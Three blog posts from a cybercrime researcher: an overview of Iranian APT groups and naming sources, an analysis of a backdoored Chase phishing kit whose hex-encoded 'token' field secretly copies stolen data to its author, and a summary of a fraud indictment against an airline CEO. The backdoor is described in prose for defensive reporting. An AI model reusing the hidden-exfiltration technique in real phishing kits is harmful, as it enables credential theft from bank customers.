Thursday, January 09, 2020

Iranian APT Group Overview

Today the Birmingham InfraGard Chapter and the Alabama ISSA held a joint meeting featuring a presentation from the Cybersecurity & Infrastructure Security Agency, part of DHS that was formerly known as the NPPD.  I learned of a ton of offerings from at the meeting, so I want to start by sharing a link to their CISA Insights Page, where they released earlier this week some guidelines for updating your company's Risk Assessment regarding potential cyber or physical threats from Iranian actors in light of our current political situation, and the tendency of the Iranian regime to lash out with Cyber attacks when they can't accomplish what they want with the limited reach of their military.  That Insight was called Increased Geopolitical Tensions and Threats and features ten readiness steps for making sure your org is not a soft target for cyber attacks from Iran. Most of these are things you should be doing anyway, but hey, an Iran threat is possibly a good time to go check those out!  One way of thinking about covering your cyber bases that I really like is actually from the Australian Government, who recommends their "Essential 8" Strategies to Mitigate Cyber Security Incidents.  Start with making sure you have your Essentials covered, but then move on to "Very Good" and "Excellent" steps as your org matures your security practices.

However, we all know that Iran has many Advanced Persistent Threat (APT) Groups, and that there is much more to watching for such activity then patching your systems and telling your users to be aware.  A large org will want to know more about the behaviors of documented Iranian APT Groups. Often these insights include known malware families used by the actor, or what sectors or countries this threat group historically has attacked.

I've seen several documents that share a woefully incomplete list of APT groups from Iran, so I've tried to pull together some helpful links to the main groups below.  In each case, if their is a "MITRE Group #" after the main title, you will find a very robust list of TTPs (Tactics, Techniques, and Procedures) about the group and links to many more reports and resources about the group than I have provided below.  However, I DO like the reports I've listed and think you might want to read them as part of "basic understanding" before following a dozen reports about the same group.  One slight complaint about the MITRE data, and APT Group Naming in general, is there is a great deal of disagreement about which group names are aliases for the same groups, and which may be entirely different groups that just share some tools with one another.  Hey, I'm doing the best I can here, and so is MITRE.  It's tricky!  If you feel I've really got something screwed up, leave a comment!  Let's chat!

Most every vendor it seems likes to put their own personal spin on APT Groups.  I have to confess to being a sucker for the CrowdStrike naming conventions (Hi Adam! Hi Dmitri! Hi Shawn!).  They use a different Animal to label each APT Group based on the name of the country where the group is hosted.  Their name for Iran is "Kitten" (as in "Persian Kitten", get it?)

While there are several excellent APT Disambiguation efforts, my favorite for ease of use is the one run by Florian Roth (Twitter @Cyb3rops ) - APT Groups and Operations.  Go to the Iran tab. There are columns for malware sets and links related to each group as well.

If you prefer a much more detailed read of APT Groups, the ThaiCERT has an amazing Threat Actor Encyclopedia! A 275 page omnibus of APT!  However, it is really tricky to pull out, for example, JUST the Iran stuff from it.

For now, I'll organize this by the CrowdStrike Kitten Names. Their set includes at least:

but there are many other companies naming other Iranian APT Groups that may or may not link up with the Kittens.  FireEye is the main user of the numbered APT Groups.  Many of these now have a "Kitten" name as you see above ... APT33, 34, 35, and 39 are all Iranian.  There are several "less well labeled" actors who either don't really behave like traditional APT, or haven't been as widely linked as those above, but are still serious.  A few of those below:
  • Cyber Fighters of Izz Ad-Din Al Qassam - the bank DDOS guys.  
  • DarkHydrus (AKA Lazy Meerkat) - some say is actually also Slayer Kitten, others disagree
  • Gold Iowell (AKA Boss Spider) - these are the SamSam Ransomware guys 

If it would be helpful to just have the MITRE links all in one place, here you go!

Thursday, January 02, 2020

Backdoored Phishing Kits are still popular

What did you do for the holidays?  If you're a cybercrime geek you probably took advantage of some of the extra time on your hands to investigate some new phishing sites, right?

Jone Fredrick is the type of Facebook user who is quite open about his criminal activity.  He boasts about his phishing skills by having a Facebook profile picture of someone taking a selfie showing their government issued ID and their credit card!  He claims to live in Blida, Algeria, and probably does.  Over the holidays Jone update his YouTube channel, "mr azert" with a new Chase Bank phishing kit.  (Phishers don't call this phishing.  They call it "bank scams" or "scam pages."

In the past two weeks, Jone, who uses the alias "Mr Azert", has uploaded several videos about his new scam pages to his YouTube channel.  Chase, Spotify, Dropbox, Alibaba, and Paypal all have new scam pages courtesy of Mr Azert.  How generous that he just gives them away for free!

After listening to so much bad gangster/scammer rap music, it was nice to hear some Algerian rap while I did my investigation.  Mr Azert confirms this is him by replying to "Tutor Arena421" giving him his email address ( and Facebook address ( jone.fredrick.79).

Of course, we report the offending content to YouTube.  If you ever encounter the same, please use the "Report" function.  The correct flow is to click the "Three Dots" ... then "Report".  Then choose  "Spam or misleading" and then the subcategory "Scams / fraud"

In this case, the reason Mr Azert is giving away these phishing kits is that he has backdoored all of the kits.  We'll look at the Chase one first.   There are five separate PHP files that send the various stolen information back to the person using the kit.  

When we look at the actual "Send" command, we notice that the email command says "for each $send" ... but the instructions for the kit have told the kit downloader that they should include their own email address in a certain place, which is "import"ed into this code.  What other address is being used here?

If we scroll up about we see that $send is receiving a variable called "token" from the form post that called this PHP code, and then converting it into ASCII with "hex2bin".

The calling code in this case is "myaccount.php" which seems to do some "input validation" but in reality, is also loading the "token" value:

That hex string at the bottom starting with "6665" is decoded in the "hex2bin" call into a pair of email addresses:  and

So, anyone who downloads Mr Azert's kit is going to either create or hack a website, upload and unpack the kit, spam out links to that URL, and then have all of their stolen data go back to Mr Azert in Algeria, who is likely to be better at cashing out the information than someone too lame to make their own phishing kit.

We're of course reporting all of this to YouTube, Gmail, Yahoo, and Facebook ... 

So how did you spend YOUR holiday?  

Happy New Year everyone!

Wednesday, December 04, 2019

Air Peace CEO charged with millions in money laundering re-buying planes he already owns

The Department of Justice announced last week that they were indicting the CEO of Air Peace for bank fraud and money laundering.

I had some difficulty finding the indictments for this case on PACER.  It turns out I couldn't find it in PACER because the court system decided that "Allen Ifechukwu Athan Onyema" should be listed in PACER with the last name "Athan Onyema", not "Onyema."

A friend shared a copy of the indictment from, which has had some interesting articles, such as this one:

Why we ain’t castigating Allen Onyema, by militant group

which says in part "We expect Allen Onyema to put up a good defence for himself. So far, no American bank has accused him of defrauding or absconding with its money. He is innocent until proven guilty." ... which just shows that the Joint Revolutionary Council's spokesperson also didn't read the court documents, because that is EXACTLY what he is accused of!

Onyema is well-loved by many, earning wide admiration and praise for recently using his planes to repatriate many Nigerians who found themselves being shunned by xenophobia in South Africa, as was described in this BBC Pidgin article:
(from @flyairpeace's Instagram account)
Reading the indictment was VERY interesting.  I had previously suggested on Twitter that Onyema was buying imaginary airplanes, but that was NOT the case!  The airplanes are REAL and various plane spotter types have the planes with those Manufacturer numbers listed as now being property of Air Peace, which boasts a growing fleet of planes, which are listed here:

The problem was that fake Lines of Credit, fake Appraisals, and fake Purchase documents all claimed Onyema was buying these planes from Springfield Aviation, when in fact, he had ALREADY BOUGHT THEM FROM OTHER OWNERS!  He basically bought all the planes TWICE and then bonused the money back to himself from Springfield.  He paid Springfield over $20M for the planes he already owned, and then over the course of many months, Springfield sent him back $15M of the same money.

It seems that Onyema lived for a while in Atlanta, Georgia.  In January 2016, he closed a Bank of America account and moved $4,000,396.43 via cashier's check to a pair of Wells Fargo accounts, opened in person in Atlanta, Georgia.

A LOT of money was then moved into that account, mostly from charities in Nigeria that Onyema controlled, including "All-Time Peace Media Communications" and "Foundation for Ethnic Harmony."

Onyema used the money to go shopping.  Prada, Neiman Marcus, Macy's, Louis Vuitton, the Apple store, a $180,000 Rolls Royce, a $88,500 Mercedes.  Over the course of eight years, $44.9 million was transferred from foreign accounts into Onyema's personal accounts at Bank of America, Wells fargo, and JP Morgan Chase.  Mostly from the "charities" that he was running back in Africa, including Foundation for Ethnic Harmony, International Center for Non-Violence and Peace Development, All-Time Peace Media Communications Limited, and Every Child Limited.

In July 2016, Onyema opened a Wells Fargo checking account in Atlanta (WF 8621) in the name Springfield Aviation Company, LLC.  He regularly spent money from that account for personal expenses, including grocery shopping at Publix, shopping at Macy's, DSW, staying at the Ritz Carlton, and eating at various restaurants.

In November 2017, Onyema opened new bank accounts in the name of "Springfield Aviation Company, LLC" but he was the sole authorized signatory.

The stories of his double-purchased planes are told in six "Letters of Credit" scenarios in the indictment.

Letter of Credit One: FB16TLL000 for Boeing MSN: 28721

On or about February 10, 2017, Wells Fargo transferred $1,982,228.46 into Springfield Aviation’s Wells Fargo account, WF 8621.  According to the court documents, however, the plane he was purchasing was already owned by Air Peace! Planespotters shows that it was registered to Air Peace  (new registration: 5N-BUJ ... and that the previous owner was Aurora, a Russian airline, who used the Registration number RA-73013, but notes they stored the plane at an airport in Tallin until 09JUN2016.)

The plane, as painted by the previous owner ...

The plane, while being repainted as Air Peace (note the tail is not yet reattached)

Both of those photos were taken in Tallin, Estonia, where the previous owner stored the plane before selling it to Air Peace.

Letter of Credit Two - LCITF-17-00414 for Boeing MSN: 27910

The court documents say the second plane was purchased by Air Peace from AerSale Inc on April 25, 2017 for $3,751,460 USD.  This is consistent with the history of that plane, which was previously sold by AerSale to Air Nigeria, and afterwards leased several times before being sold to Air Peace:

Wells Fargo received a credit request from Fidelity Bank of Nigeria saying that Air Peace was going to buy the plane for $4,750,000 from Springfield Aviation.  BUT SPRINGFIELD NEVER OWNED THE PLANE!  A company with no history of aviation, JMI LLC, provided a "full aircraft appraisal" saying the plane was worth $5,500,000 and Wells Fargo transferred $4,750,000 from Onyema's accounts into Springfield Aviation's Wells Fargo account, WF 8621, on April 25, 2017.

Letter of Credit Three - ILCCOCBG1702932 - Boeing MSN: 28561 and Boeing MSN: 28562

These two planes were bought from Texas based Jetran, LLC on May 18, 2017.  $3,600,000 was the purchase price for the pair of planes. The wire transfer was sent from WF 8020 on May 15, 2017.

On October 2017, Wells received another letter of credit request, asking for $3,480,000 to be paid to Springfield Aviation's WF 8621 bank account.  JMI again provided an appraisal, claiming that just the 28561 plane was being sold and that it appraised by itself for $5,400,000.

On November 29, 2017, Well Fargo transferred $4,899,690 to Springfield Aviation's Wells Fargo account WF 8621 FOR A PLANE THAT HAD ALREADY BEEN PURCHASED FROM JETRAN nine months earlier!

Letter of Credit Four - LCITF-17-00555 - Boeing MSN: 28660

In January 2017, Onyema bought another Boeing 737-300, MSN: 28660, from Oklahoma-based Aero Acquisition.  He paid $2,315,000 for the plane on January 9, 2017, wiring the money from his Wells 8020 account.

In April 2017, Wells received ANOTHER letter of credit request FOR THE SAME PLANE, but this time, claiming it would be purchased for $4,500,000 from Springfield Aviation.  On June 19, 2017, Wells Fargo transferred $4,499,900 to Springfield Aviation's Wells Fargo 8621 account, FOR A PLANE THAT SPRINGFIELD NEVER OWNED and that Onyema had already purchased from Aero Acquisition SIX MONTHS EARLIER!

None of the plane spotter photos of this plane are the Air Peace version...but its also a very real plane.

Letter of Credit Five - FB17ILC00561C - Boeing MSN: 28562

This is the second plane previously mentioned having been purchased in May 2017 from Jetran, LLC.  Again, a new letter of credit arrives, this time to JPMorgan Chase Bank.

On Feb 20, 2018, JPMorgan Chase transferred $4,087,028 to Springfield Aviation's JPMC 5512 bank account, FOR A PLANE THAT Onyema had already bought 9 months earlier from Jetran!

The plane was photographed with its Air Peace paint job and registration 5N-BUL in February 2018:

Many previous photos as the Meridiana plane and as the Air Italy plane have been taken of the same airframe

After being paid $20,218,846 for planes it never owned, what happened next?
Springfield began sending the money back to Onyema.  All of the transfers listed below were sent from the Springfield Aviation bank accounts back to Onyema's personal accounts.
  • 3/22/2017 - $1M
  • 3/23/2017 - $1M
  • 5/7/2017 - $500,000
  • 5/7/2017 - $500,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $100,000
  • 5/15/2017 - $500,000
  • 5/15/2017 - $150,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 6/19/2017 - $500,000
  • 11/29/2017 - $1M
  • 11/29/2017 - $1M
  • 11/29/2017 - $1M
  • 11/29/2017 - $1M
  • 11/29/2017 - $890,000

After sending back to Onyema $15,140,000, Onyema then tries to get the money out of the United States.  In August 2018, Onyema created Bluestream Aero Services and Springfield Aviation Company in Ontario, Canada.  He opened accounts for the companies at Bank of Montreal and sent $10 Million (in November 2018) from his personal Wells Fargo account to those bank accounts in Canada.

Based on the timing of the court documents, moving $10 Million out of the country is likely to be what triggered the investigation.  While the original Criminal Complaint is still "sealed", it was filed one month after the wire transfers to Canada.  So, while the indictments and arrest warrants were only issued on November 19, 2019, the court case began in December of 2018 with the "magistrate complaint."

As my many Nigerian Twitter followers are reminding me, everyone is Innocent until proven Guilty, but what I have learned through many years of watching the American Justice system, they don't unseal federal indictments until their evidence is rock solid!  When you cause charities you control to send you $44 Million dollars, and then you create fraudulent documents to pay a company you control $20 Million US Dollars for airplanes that you already own, and then send most of that money back to your private banking accounts, and then try to get that money out of the United States into Canada, I think it is plain to see crimes have been committed.

Of course this doesn't stop the Nigerian media from running stories stating that "the allegations of financial misdeeds against [Onyema] as a deliberate attempt to kill Air Peace and deepen the unemployement crisis in the country."

I'm sure the facts won't matter to the Concerned Diaspora Citizens, but I hope reasonable people will understand that the US Government is not persecuting businessmen.  They are charging criminals with crimes.